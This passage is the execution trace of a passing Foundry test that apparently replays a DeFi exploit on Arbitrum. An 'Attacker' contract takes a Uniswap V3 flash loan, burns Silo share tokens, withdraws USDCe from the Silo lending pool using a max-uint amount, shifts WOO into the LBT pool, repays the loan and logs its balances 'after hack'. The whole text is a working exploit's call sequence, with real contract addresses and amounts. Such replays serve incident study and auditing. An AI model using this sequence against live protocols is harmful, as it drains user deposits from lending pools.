    │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 5083902323623058456015968 [5.083e24])
    │   │   │   │   │   │   │   ├─ [305] Silo::siloRepository() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000008658047e48cc09161f4152c79155dac1d710ff0a
    │   │   │   │   │   │   │   ├─ [642] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getNotificationReceiver(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000d592f705bdc8c1b439bd4d665ed99c4faad5a680
    │   │   │   │   │   │   │   ├─ [767] 0xd592F705bDC8C1B439Bd4D665Ed99C4FaAd5A680::onAfterTransfer(0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000, 5083902323623058456015968 [5.083e24])
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit NotificationSent(param0: 0xd592F705bDC8C1B439Bd4D665Ed99C4FaAd5A680, param1: true)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000000451611f0be9f3785ba31c → 0x000000000000000000000000000000000000000000001cd2395d17b35abe2ebc
    │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000004348ee5aed2401d9d7460 → 0
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x711c36c722391b71407d4faab02e12b0ddd979f3873ac3c5d441c3cd017f468f: 0x000000000000000000000000000000000000000000045348c3b4110f5b2de4ab → 0x000000000000000000000000000000000000000000001cdef04d13e27c7a58c7
    │   │   │   │   │   │   │   @ 0x9c754c9c914dd33bd112bbe305006bc159855f0bf942085ec535d5fb55c83e56: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffbc9962c9902d3214c741b
    │   │   │   │   │   │   └─ ← [Return] 5092663209802375827262436 [5.092e24], 5083902323623058456015968 [5.083e24]
    │   │   │   │   │   ├─ [81991] Silo::withdraw(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77], true)
    │   │   │   │   │   │   ├─ [1301] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::isSiloPaused(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [579] 0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 7000000000000 [7e12]
    │   │   │   │   │   │   ├─ [349] 0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 7000000000000 [7e12]
    │   │   │   │   │   │   ├─ [8875] 0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124::burn(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7000000000000 [7e12])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 7000000000000 [7e12])
    │   │   │   │   │   │   │   ├─ [305] Silo::siloRepository() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000008658047e48cc09161f4152c79155dac1d710ff0a
    │   │   │   │   │   │   │   ├─ [642] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getNotificationReceiver(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000d592f705bdc8c1b439bd4d665ed99c4faad5a680
    │   │   │   │   │   │   │   ├─ [767] 0xd592F705bDC8C1B439Bd4D665Ed99C4FaAd5A680::onAfterTransfer(0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000000000000000000000, 7000000000000 [7e12])
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit NotificationSent(param0: 0xd592F705bDC8C1B439Bd4D665Ed99C4FaAd5A680, param1: true)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000000000065dd0837000 → 0
    │   │   │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000000000000000000000000065dd0837000 → 0
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [4697] USDCe::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7000000000000 [7e12])
    │   │   │   │   │   │   │   ├─ [3951] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7000000000000 [7e12]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 7000000000000 [7e12])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x4a118db3f320de5789eb241d5a09272e3d70541292a2d8e35e3916f8589e6a3e: 0x000000000000000000000000000000000000000000000000000006a73c49bcdc → 0x000000000000000000000000000000000000000000000000000000496bc64cdc
    │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x00000000000000000000000000000000000000000000000000000362e84245bd → 0x000000000000000000000000000000000000000000000000000009c0b8c5b5bd
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [12503] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRate(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], 1709653326 [1.709e9]) [staticcall]
    │   │   │   │   │   │   │   ├─ [1163] Silo::utilizationData(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000004534860aaf68cfd315ac7000000000000000000000000000000000000000000001cdef04d13e27c7a58c70000000000000000000000000000000000000000000000000000000065e73d4e
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [579] 0x602dB6e46B41bc2B9e2c6b3F8594C49CF8B8857D::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [12885] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRate(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1], 1709653326 [1.709e9]) [staticcall]
    │   │   │   │   │   │   │   ├─ [1163] Silo::utilizationData(WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000002a186545fb83e163f000000000000000000000000000000000000000000000000012de6cdf88fc86a0000000000000000000000000000000000000000000000000000000065e6a597
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000293e09aa9f
    │   │   │   │   │   │   ├─ [579] 0xf13a33bd14D05B869B8f97095b63cae84d573852::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [12709] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRate(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], 1709653326 [1.709e9]) [staticcall]
    │   │   │   │   │   │   │   ├─ [1163] Silo::utilizationData(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000b79aa4eb400000000000000000000000000000000000000000000000000000006e401a08f70000000000000000000000000000000000000000000000000000000065e73d4e
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [579] 0xDa3abf6F119E2D573e9a56E9679c0f87D4547799::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ emit Withdraw(param0: USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], param1: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param3: 7000000000000 [7e12], param4: true)
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xfae661be131f43b7bc6448d3c1746dcea928fc831564e55f46bb31af01f101a1: 0x0000000000000000000000000000000000000000000000000000065dd0837000 → 0
    │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x00000000000000000000000000000000000000000000000000000362e84245bd → 0x000000000000000000000000000000000000000000000000000009c0b8c5b5bd
    │   │   │   │   │   │   └─ ← [Return] 7000000000000 [7e12], 7000000000000 [7e12]
    │   │   │   │   │   ├─ [4527] WOO::transfer(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD], 2704571537527334874193677 [2.704e24])
    │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   │   ├─ [3387] 0x3f770Ac673856F105b586bb393d122721265aD46::transfer(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD], 2704571537527334874193677 [2.704e24]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: LBT: [0xB87495219C432fc85161e4283DfF131692A528BD], value: 2704571537527334874193677 [2.704e24])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x4ec4c5765dd102b25c7e93e63f27d3057d7661347ea5717c00c5d0dbc9555124: 100 → 0x000000000000000000000000000000000000000000023cb71de8aaf932491f71
    │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x0000000000000000000000000000000000000000000458a3315dd7a2947d7e04 → 0x000000000000000000000000000000000000000000021bec13752ca962345ef7
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0: 2 → 1
    │   │   │   │   │   └─ ← [Return] 0xab5c473bce5960a8292e9c8db82f9272504caab4e9ef09553fc112f82b62a3c2
    │   │   │   │   ├─ [3296] WETH::balanceOf(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD]) [staticcall]
    │   │   │   │   │   ├─ [2553] 0x8b194bEae1d3e0788A1a35173978001ACDFba668::balanceOf(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD]) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 154927945956748531302 [1.549e20]
    │   │   │   │   │   └─ ← [Return] 154927945956748531302 [1.549e20]
    │   │   │   │   ├─ [1602] WOO::balanceOf(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD]) [staticcall]
    │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   ├─ [465] 0x3f770Ac673856F105b586bb393d122721265aD46::balanceOf(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD]) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 2704571537527334874193777 [2.704e24]
    │   │   │   │   │   └─ ← [Return] 2704571537527334874193777 [2.704e24]
    │   │   │   │   ├─ emit FlashLoan(param0: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 8385079 [8.385e6], param3: 0x000000000000000000000000000000000000000000023cb6623e110c5808cb69, param4: 0x000000000000000000000000000000000000000000000000bbaa99ecda4053a4, param5: 0x0000000000000000000000000000000000000000000000002588852f5ed9aa54)
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 5: 0x0000000000000008660ea20114e996660000000000023cb6623e110c5808cbcd → 0x0000000000000008660ea20114e996660000000000023cb71de8aaf932491f71
    │   │   │   │   │   @ 6: 0x00000000000000000101d2a3a6351db80000000000000028467320bf2ab466d6 → 0x00000000000000000101d2a3a6351db800000000000000286bfba5ee898e112a
    │   │   │   │   │   @ 0x527f5f5ea3ce6176c60fdeef0b32d6849ae7a0ae8c99167e2c43ff53edc4f07e: 0x0000000000000000090f16616ba6fe16000000000000013d746b2e7101bf650a → 0x0000000000000000090f16616ba6fe16000000000000013e0a8d432e7d260e5a
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [4697] USDCe::transfer(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443], 10581734799301 [1.058e13])
    │   │   │   ├─ [3951] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::transfer(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443], 10581734799301 [1.058e13]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443], value: 10581734799301 [1.058e13])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x585ee325f1af85f6f3fd85e4ae1c2cf3022b18f1e606c34894149ba54f0331cf: 0x00000000000000000000000000000000000000000000000000000002540be400 → 0x000000000000000000000000000000000000000000000000000009a214971bc5
    │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x000000000000000000000000000000000000000000000000000009c0b8c5b5bd → 0x00000000000000000000000000000000000000000000000000000020f83a7df8
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 3: 2 → 1
    │   │   │   @ 32: 0 → 0x000000000000000000000000000000000000000000023cb6623e110c5808cb69
    │   │   └─ ← [Stop]
    │   ├─ [1296] WETH::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [staticcall]
    │   │   ├─ [553] 0x8b194bEae1d3e0788A1a35173978001ACDFba668::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [delegatecall]
    │   │   │   └─ ← [Return] 432042397152000341752 [4.32e20]
    │   │   └─ ← [Return] 432042397152000341752 [4.32e20]
    │   ├─ [1296] USDCe::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [staticcall]
    │   │   ├─ [553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [delegatecall]
    │   │   │   └─ ← [Return] 10591734799301 [1.059e13]
    │   │   └─ ← [Return] 10591734799301 [1.059e13]
    │   ├─ emit Flash(param0: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 10576446576012 [1.057e13], param4: 0, param5: 5288223289 [5.288e9])
    │   ├─  storage changes:
    │   │   @ 2: 0x000000000000000000000000000000000000682a3f3b634e38f0ef880d31dd34 → 0x000000000000000000000000000000000000683c7321bf9a0734874b8cc58617
    │   └─ ← [Stop]
    ├─ [1296] USDCe::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 141603536376 [1.416e11]
    │   └─ ← [Return] 141603536376 [1.416e11]
    ├─ [0] console::log("USDCe after hack: %s", 141603536376 [1.416e11]) [staticcall]
    │   └─ ← [Stop]
    ├─ [1602] WOO::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   ├─ [465] 0x3f770Ac673856F105b586bb393d122721265aD46::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 2549710367944099228835575 [2.549e24]
    │   └─ ← [Return] 2549710367944099228835575 [2.549e24]
    ├─ [0] console::log("WOO after hack: %s", 2549710367944099228835575 [2.549e24]) [staticcall]
    │   └─ ← [Stop]
    ├─ [1296] WETH::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [553] 0x8b194bEae1d3e0788A1a35173978001ACDFba668::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 522295261244159469020 [5.222e20]
    │   └─ ← [Return] 522295261244159469020 [5.222e20]
    ├─ [0] console::log("WETH after hack: %s", 522295261244159469020 [5.222e20]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 33: 0 → 0x0000000000000000000000000000000000000000000000000000099e8557558c
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 78.46s (76.77s CPU time)

Ran 2 test suites in 79.78s (79.45s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
